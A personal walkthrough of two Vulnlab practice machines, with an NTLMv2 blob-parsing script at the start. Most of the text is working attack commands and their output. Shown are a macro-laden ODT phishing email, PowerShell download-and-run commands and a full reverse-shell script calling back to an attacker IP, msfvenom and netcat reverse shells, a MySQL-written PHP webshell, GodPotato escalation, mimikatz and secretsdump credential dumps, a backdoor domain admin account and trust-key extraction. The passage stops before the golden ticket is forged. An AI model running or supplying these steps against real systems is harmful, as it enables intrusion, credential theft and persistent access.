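    "07000800" "80f42a66e1c3da01"                   # MsvAvTimestamp
    "06000400" "02000000"                           # MsvAvFlags
    "08003000" "30000000" "00000000" "00000000" "00200000"   # MsvAvSingleHost (48 bytes)
               "f3afad144322c33a39d814751dfc312d1dd988dd18fbcedeab107cb49d9d8473"
    "0a001000" "00000000" "00000000" "00000000" "00000000"   # MsvAvChannelBindings
    "09001e00" "63006900660073002f00310030002e0038002e0032002e003100330038"  # MsvAvTargetName
    "00000000"                          # MsvAvEOL
    "00000000"                          # trailing padding impacket appends
)

# AV_PAIR ids from MS-NLMP 2.2.2.1
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
UNICODE_AVS = (1, 2, 3, 4, 5, 9)

FILETIME_EPOCH_DELTA = 116444736000000000  # 100ns ticks from 1601-01-01 to 1970-01-01


def filetime_to_datetime(ticks):
    """Convert a Windows FILETIME (100ns ticks since 1601) to an aware UTC datetime."""
    return datetime.fromtimestamp((ticks - FILETIME_EPOCH_DELTA) / 10_000_000, tz=timezone.utc)


def parse_av_pairs(data):
    """Walk the AV_PAIR list (id:2, len:2, value) until MsvAvEOL."""
    pairs, off = {}, 0
    while off + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, off)
        off += 4
        if av_id == 0:                       # MsvAvEOL
            break
        value = data[off:off + av_len]
        off += av_len
        name = AV_NAMES.get(av_id, f"Unknown{av_id}")
        if av_id in UNICODE_AVS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 6:                     # MsvAvFlags, 0x2 = client sent a MIC
            pairs[name] = struct.unpack("<I", value)[0]
        elif av_id == 7:                     # MsvAvTimestamp
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:                                # SingleHost, ChannelBindings: keep raw hex
            pairs[name] = value.hex()
    return pairs


def parse_netntlmv2(line):
    """Split impacket's NetNTLMv2 line and decode the NTLMv2_CLIENT_CHALLENGE blob."""
    user, rest = line.strip().split("::", 1)
    domain, server_challenge, nt_proof, blob_hex = rest.split(":", 3)
    blob = bytes.fromhex(blob_hex)
    if blob[0] != 1 or blob[1] != 1:
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob")
    timestamp, client_challenge = struct.unpack_from("<Q8s", blob, 8)
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge, "nt_proof": nt_proof,
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_challenge.hex(),
        "av": parse_av_pairs(blob[28:]),     # AV_PAIRs start after Reserved3
    }


def target_is_ip_literal(info):
    """True when the SPN in MsvAvTargetName names a bare IPv4 address instead of a host."""
    target = info["av"].get("TargetName", "")
    host = target.split("/", 1)[1] if "/" in target else target
    parts = host.split(".")
    return len(parts) == 4 and all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)


if __name__ == "__main__":
    info = parse_netntlmv2(CAPTURED)
    print(f"{info['domain']}\\{info['user']} responded at {info['timestamp']:%Y-%m-%d %H:%M:%S} UTC")
    for key, val in info["av"].items():
        print(f"  {key:16} {val}")
    print("target is a bare IP:", target_is_ip_literal(info))
```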

It seems phishing is the way to go, so I did the following.

The following write-up provides a very good example of how to do this:

https://0xdf.gitlab.io/2020/02/01/htb-re.html

msf6 > set payload windows/x64/exec
payload => windows/x64/exec
msf6 > set LHOST 10.8.2.138
LHOST => 10.8.2.138
msf6 > set LPORT 80
LPORT => 80
msf6 > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');"
cmd => powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');

shell.txt

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cat shell.txt            
function cleanup {
    if ($client.Connected -eq $true) {$client.Close()}
    if ($process.ExitCode -ne $null) {$process.Close()}
    exit
}
# Setup IPADDR
$address = '10.8.2.138'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
# Relay cmd.exe's banner and first prompt to the listener
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
    if ($client.Connected -ne $true) {cleanup}
    # Read from the socket until a newline (byte 10) arrives or the buffer is full
    $pos = 0; $i = 1
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}
    }
    if ($pos -gt 0) {
        # Feed the received line to cmd.exe, then send back whatever it printed
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.write($string)
        start-sleep 1
        if ($process.ExitCode -ne $null) {cleanup}
        else {
            $out = $encoding.GetString($outputstream.Read())
            while($outputstream.Peek() -ne -1){
                $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}
            }
            $stream.Write($encoding.GetBytes($out),0,$out.length)
            $out = $null
            $string = $null
        }
    } else {cleanup}
}

msf6 exploit(multi/misc/openoffice_document_macro) > show options

Module options (exploit/multi/misc/openoffice_document_macro):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BODY                       no        The message for the document body
   FILENAME  msf.odt          yes       The OpenOffice Text document name
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                         local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


Payload options (windows/x64/exec):

   Name      Current Setting                         Required  Description
   ----      ---------------                         --------  -----------
   CMD       powershell.exe -nop -w hidden -ep bypa  yes       The command string to execute
             ss -c IEX(New-Object Net.WebClient).Do
             wnloadString('http://10.8.2.138/shell.
             txt');
   EXITFUNC  thread                                  yes       Exit technique (Accepted: '', seh, thread, process, none)


Exploit target:

   Id  Name
   --  ----
   0   Apache OpenOffice on Windows (PSH)



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/openoffice_document_macro) > set srvport 80
srvport => 80
msf6 exploit(multi/misc/openoffice_document_macro) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Using URL: http://10.8.2.138/7Jnb1x3
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /home/puck/.msf4/local/msf.odt
exit
[*] Server stopped.
[*] Server stopped.

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cp /home/puck/.msf4/local/msf.odt .

Now the malicious ODT is downloaded:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:05:37] "GET /7Jnb1x3 HTTP/1.1" 200 -


┌──(puck㉿kali)-[~/vulnlab/job]
└─$ sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a msf.odt
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rm 7Jnb1x3 
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cp shell.txt 7Jnb1x3 


Run it again:
sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138>
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

Now the shell is downloaded:
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:02:57] "GET /7Jnb1x3 HTTP/1.1" 200 -
10.10.114.36 - - [28/Jun/2024 10:04:02] "GET /7Jnb1x3 HTTP/1.1" 200 -


And we catch the shell as the user:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rlwrap nc -nlvp 443                  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 52139
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
job\jack.black

c:\Users\jack.black\Desktop>type user.txt
VL{0fa1<REDACTED>5dc1}
PS C:\inetpub\wwwroot> dir


    Directory: C:\inetpub\wwwroot


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        11/10/2021   8:52 PM                aspnet_client                                                        
d-----         11/9/2021   9:24 PM                assets                                                               
d-----         11/9/2021   9:24 PM                css                                                                  
d-----         11/9/2021   9:24 PM                js                                                                   
-a----        11/10/2021   9:01 PM            298 hello.aspx                                                           
-a----         11/7/2021   1:05 PM           3261 index.html                                                           


PS C:\inetpub\wwwroot> curl http://10.8.2.138/cmdasp.aspx -o cmdasp.aspx
PS C:\inetpub\wwwroot> curl http://10.8.2.138/reverse.aspx -o reverse.aspx

Privesc

After checking the files and folders on this machine, I noticed that C:\inetpub\wwwroot lets us upload files to the website.

I created an ASPX reverse shell with

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f aspx > reverse.aspx

and then requested http://job.local/reverse.aspx with curl to get a new shell:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53689
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140720521084928
[*] DispatchTable: 0x140720523675512
[*] UseProtseqFunction: 0x140720522968944
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\a0c54595-80de-4e4f-a985-93a2101db089\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0854-ffff-ad4d-dae1b390a835
[*] DCOM obj OXID: 0x7374a001401060e1
[*] DCOM obj OID: 0x734f5c52566383ce
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x732  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3552

SeImpersonatePrivilege is enabled, so we used GodPotato, and we have an admin shell:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 443  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53837
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{0102<REDACTED>5152}

That’s all.
We now have an Admin reverse shell.

vulnlab-trusted


nmap

enum

gobuster dir -x php -w /usr/share/wordlists/dirb/big.txt -u http://10.10.146.246/dev/

http://lab.trusted.vl/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php

echo "PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=" | base64 -d  
<?php 
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
  die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>

Upload a PHP shell (CrackStation can crack Robert’s hash):

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ mysql -u root -h lab.trusted.vl -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 8
Server version: 10.4.24-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use news
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [news]> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | 7e7abb54bbef42f0fbfa3007b368def7 |
|  2 | Eric       | ewalters     | Walters   | d6e81aeb4df9325b502a02f11043e0ad |
|  3 | Christine  | cpowers      | Powers    | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.022 sec)
MariaDB [news]> select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/dev/back.php';
Query OK, 1 row affected (0.023 sec)

MariaDB [news]> exit

Trigger the shell:

http://lab.trusted.vl/dev/back.php?c=powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/puckshell.txt');/

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.146.246 - - [26/Jun/2024 08:13:02] "GET /puckshell.txt HTTP/1.1" 200 -


┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ nc -nlvp 443  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.146.246] 64409
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\dev>whoami
nt authority\system

Get some more hashes

C:\temp>hostname
labdc

C:\temp>whoami
nt authority\system

c:\temp>curl http://10.8.2.138/mimikatz.exe -o mimi.exe

C:\temp>mimi

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/


mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 1685702 (00000000:0019b8c6)
Session           : Batch from 0
User Name         : cpowers
Domain            : LAB
Logon Server      : LABDC
Logon Time        : 6/26/2024 6:30:01 AM
SID               : S-1-5-21-2241985869-2159962460-1278545866-1107
    msv :	
     [00000003] Primary
     * Username : cpowers
     * Domain   : LAB
     * NTLM     : 322db798a55f85f09b3d61b976a13c43
     * SHA1     : e845d39122d58246ff7e28a282e8ed0e19ede373
     * DPAPI    : 01644e36ac919f8de1101ff9fde5a7fb
    tspkg :	
    wdigest :	
     * Username : cpowers
     * Domain   : LAB
     * Password : (null)
    kerberos :	
     * Username : cpowers
     * Domain   : LAB.TRUSTED.VL
     * Password : (null)
    ssp :	
    credman :	
    cloudap :	




mimikatz # exit
Bye!


Examine further:

C:\temp>hostname
labdc

C:\temp>whoami
nt authority\system

C:\temp>net user puck Passw0rd123! /add /domain
The command completed successfully.


C:\temp>net localgroup Administrators puck /add /domain
The command completed successfully.


C:\temp>

We can now also RDP to lab.trusted.vl:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ xfreerdp /v:10.10.250.102 /u:puck          
[11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - CN = labdc.lab.trusted.vl
Password: 

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ impacket-secretsdump 'puck@lab.trusted.vl'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x68580865f85a4743db214876adf784df
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:86a9ee70dfd64d20992283dc5721b475:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd:::
lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a:::
lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43:::
puck:2102:aad3b435b51404eeaad3b435b51404ee:ab4f5a5c42df5a0ee337d12ce77332f5:::
LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:61f6701481ff18844346b2f8ca47119a:::
TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:88b2e30fba183f0fcdaba561a6ae64f5:::
[*] Kerberos keys grabbed

Then evil-winrm into lab.trusted.vl:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u puck -p Passw0rd123! -i lab.trusted.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\puck\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> whoami
lab\puck
*Evil-WinRM* PS C:\temp> . ./PowerView.ps1


At C:\temp\PowerView.ps1:

Forest                  : trusted.vl
DomainControllers       : {labdc.lab.trusted.vl}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : trusted.vl
PdcRoleOwner            : labdc.lab.trusted.vl
RidRoleOwner            : labdc.lab.trusted.vl
InfrastructureRoleOwner : labdc.lab.trusted.vl
Name                    : lab.trusted.vl

Forest                  : trusted.vl
DomainControllers       :
Children                :
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            :
RidRoleOwner            :
InfrastructureRoleOwner :
Name                    : trusted.vl



*Evil-WinRM* PS C:\temp> Get-DomainTrust


SourceName      : lab.trusted.vl
TargetName      : trusted.vl
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 9/14/2022 6:42:24 PM
WhenChanged     : 6/26/2024 6:21:06 AM


Trust Abuse

Using the article, we can abuse the child->parent domain trust relationship and escalate to the enterprise domain (the forest root, trusted.vl).

We need the krbtgt hash of lab.trusted.vl and the SIDs of both domains; then, with mimikatz, we forge a golden ticket for the enterprise domain admin:

lsadump::dcsync /domain:lab.trusted.vl /all

Get the domain SIDs of lab.trusted.vl and trusted.vl by running:

*Evil-WinRM* PS C:\temp> ./mimi.exe  "lsadump::trust /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: LAB.TRUSTED.VL (LAB / S-1-5-21-2241985869-2159962460-1278545866)

Domain: TRUSTED.VL (TRUSTED / S-1-5-21-3576695518-347000760-3731839591)
 [  In ] LAB.TRUSTED.VL -> TRUSTED.VL
    * 6/26/2024 9:25:12 AM - CLEAR   - bd e0 30 b1 e3 5a 6f 28 d7 db 2d 12 f0 19 86 28 ee be df fa 8f 77 b0 7c 8a 82 05 e0 3f c0 85 81 2d 3a 45 eb 64 22 c6 e5 a3 e0 04 3f f8 fd 6d 59 d5 67 36 5d 32 f5 f2 01 3d 4a e9 29 91 c7 30 fa a4 a5 52 22 e6 17 09 c7 86 36 d7 ae 92 38 d2 7f 7a ec 7c 92 97 b6 e7 8f d3 59 74 97 31 70 8a 7d 88 11 29 e4 5c 0e ab b8 41 2a 35 39 68 f4 af 7b 01 bb 5c 6b a6 1d a6 2a d9 dc da 70 62 7e 75 c2 c4 95 9c 61 7c 98 b7 39 76 64 d6 d4 a3 9f fb f0 3c d7 76 d5 26 95 1b 96 e8 3f c2 a7 f2 99 9e 0a e9 b4 30 bf a9 6b 3a e1 ed 1e 33 17 70 43 41 d2 14 11 39 c8 d2 d5 41 54 24 f9 85 db 69 22 70 85 62 47 06 e3 2c 0a e1 bb 6e 8a 41 e8 09 1e e8 27 59 9e e7 14 d3 aa 3f 05 c3 6e 89 12 e7 cc 11 af 1a d9 a5 36 f8 2f e5 bb d5 d9 17 29 7d 11 d5 d5
    * aes256_hmac       87a58ba0eaa56e07d5eaadca5d5d043c64ef85efe9420279a98919d6d7b919f8
    * aes128_hmac       afe52545c051a7f537ea55d5abc96d31
    * rc4_hmac_nt       f3a4b4a5c1302b7da515ce596ad3281d

 [ Out ] TRUSTED.VL -> LAB.TRUSTED.VL
    * 6/26/2024 9:25:10 AM - CLEAR   - 31 dd 12 7a 9e f6 47 94 cd 56 25 1b 58 e6 e3 53 f6 77 19 eb ac bf 4f 28 1a 2d 1e 60 3b 16 6a 94 f7 25 a3 2e 40 13 fb 3d bf a4 42 a2 b1 42 bd 64 89 d6 8a 72 91 a7 da 2d ba 83 1e 6c 25 af ef ec 8c 98 3a 67 ad 67 a1 d8 d9 55 f4 dd 23 bc 93 01 16 10 7e ef 64 84 a3 be 02 25 c8 a6 45 93 b4 e8 5c 27 ee 44 06 a7 81 a0 c2 8e 3c 99 32 2b 4e 5a 19 58 55 8c bb b3 c3 24 55 9f 49 da ba 08 65 1c 3d 3c 59 36 cf 0c fe 15 3c 56 60 c8 1b e1 dd 33 54 c4 dd e3 2a a5 20 bf 9d fe dc ff 9e 61 7b 15 08 d3 22 6b a1 71 2d 48 5e 40 3f 66 fb d2 c6 cc 0c d5 af f1 0d 65 3d 72 45 2a c2 2e d7 86 e3 e0 4f 59 c2 61 fc d2 de d1 87 66 4f f8 f6 ee a4 ed e5 3e df bc b5 86 3a 13 ba ee 39 cb 28 84 58 7d 8d 65 43 28 9b f2 b4 d0 69 99 d2 c1 37 d5 d6 45
    * aes256_hmac       3e09cb23acb863c8d23bf8d07eace010cb980d5cfbda991345e4a7cec5352ad7
    * aes128_hmac       01b6b1243a4a9b0ed26869f79ef1ae75
    * rc4_hmac_nt       4eba988516b0b0fcf99c8f1b10e552de

 [ In-1] LAB.TRUSTED.VL -> TRUSTED.VL
    * 5/27/2023 4:19:25 PM - CLEAR   - ea 31 66 22 35 93 0e ef 05 dd e5 94 f0 70 b5 dd 2c de b4 ec 7a 47 73 ae 20 45 15 00 9c 0c 1a 7e 9a f4 68 c7 22 c9 d2 35 cb 67 bb 8d 56 7e 5b 9f 4e 9c b4 4c 77 a6 b7 41 2e d9 3d e4 87 73 5b ee 44 8b 4f 3f f3 e8 ac 32 21 08 db 79 9a 55 2b a0 6f c2 dd 69 c6 9a b7 4d e1 8a 4c f6 e8 0b 47 a9 cb cf 4d 6f 14 8c 28 44 66 63 85 20 13 3b c8 93 bd 20 38 ff 6c 73 d3 2a 61 a3 10 fc 2f d5 af 29 a8 5b 28 09 0d 1f 17 46 8d 7d 09 fa e8 55 61 2e d7 6b 3a 70 38 11 e0 42 08 4b 5b 2b be 53 2c 62 97 64 42 4e 11 fb 50 ed 2f ef 58 38 be 20 a4 4b f6 cf a7 45 18 73 56 be cd 6c 0a 78 16 f7 51 ae 82 59 95 7a 33 f0 27 a6 6d 08 62 ca 74 5f 82 13 c2 d2 aa 7b 12 96 b8 16 27 2e ee 48 bd e4 21 41 db a2 e2 92 ca f3 5d d6 76 cc b5 66 28 2a 87 92
    * aes256_hmac       a7880265164670ddfc041c250bdf7d8166bf8ca0c06d86c3ddec12620fdfb800
    * aes128_hmac       9d59311c51bd3eb6cc846cf1af53c80f
    * rc4_hmac_nt       fdb9239325aed982da5f521116ffbcaf

 [Out-1] TRUSTED.VL -> LAB.TRUSTED.VL
    * 6/26/2024 9:25:10 AM - CLEAR   - 7a 6f b9 f0 49 87 53 be 90 63 63 9c d9 8e 15 f5 ce b5 60 98 6d e6 08 0f 7b ab 3a 7b e3 59 48 a4 f4 6e 6f 1a cc 87 f2 19 81 9a 3b e5 f6 b0 59 28 ad 97 e2 fd fb 39 f8 15 98 ca 4e a9 c4 04 60 15 6a ca 97 0e 20 81 77 42 ac c0 c9 0d 4f 49 4d 64 ee 2a 0f ed aa 4c f3 5b fb 51 ef 50 1a 84 5d 15 a8 9c ce a5 37 a7 02 47 ff 67 0d 1a 59 1c f6 c9 11 9f a2 55 7f c0 45 db 29 77 db 54 9e 46 23 ea 60 a3 9d 9c 11 61 44 51 d2 3f 32 cc e3 67 95 1c a5 0a 0f c6 96 3d e2 a3 53 2b 92 41 a2 a2 46 9e 27 65 c4 84 b0 6f 6e 4e 95 70 0e ed a6 a9 8e 1b ac 66 e8 40 61 9f 6e 70 44 6e b1 fc dd a7 72 9d 3e bd ac b7 0e b9 6b 3c a6 b5 a0 d2 9b 74 91 39 02 f8 7c 31 16 09 7c 52 f3 e9 00 3e 0c 88 46 a3 05 c6 5c 2b f9 3c 0c 21 bd b2 04 8b bc 8a b0 74
    * aes256_hmac       bfc64ba951d28743ef247deb0fa7d69197b9fda301c64ae0765ba9c5c6418183
    * aes128_hmac       0fe86c75c4b6686fcae0bd01d0a1fa2c
    * rc4_hmac_nt       cddbd971c2e3e4ef64b4eb024e4e75c0


mimikatz(commandline) # exit
Bye!

Next, forge a golden ticket for the enterprise domain admin:

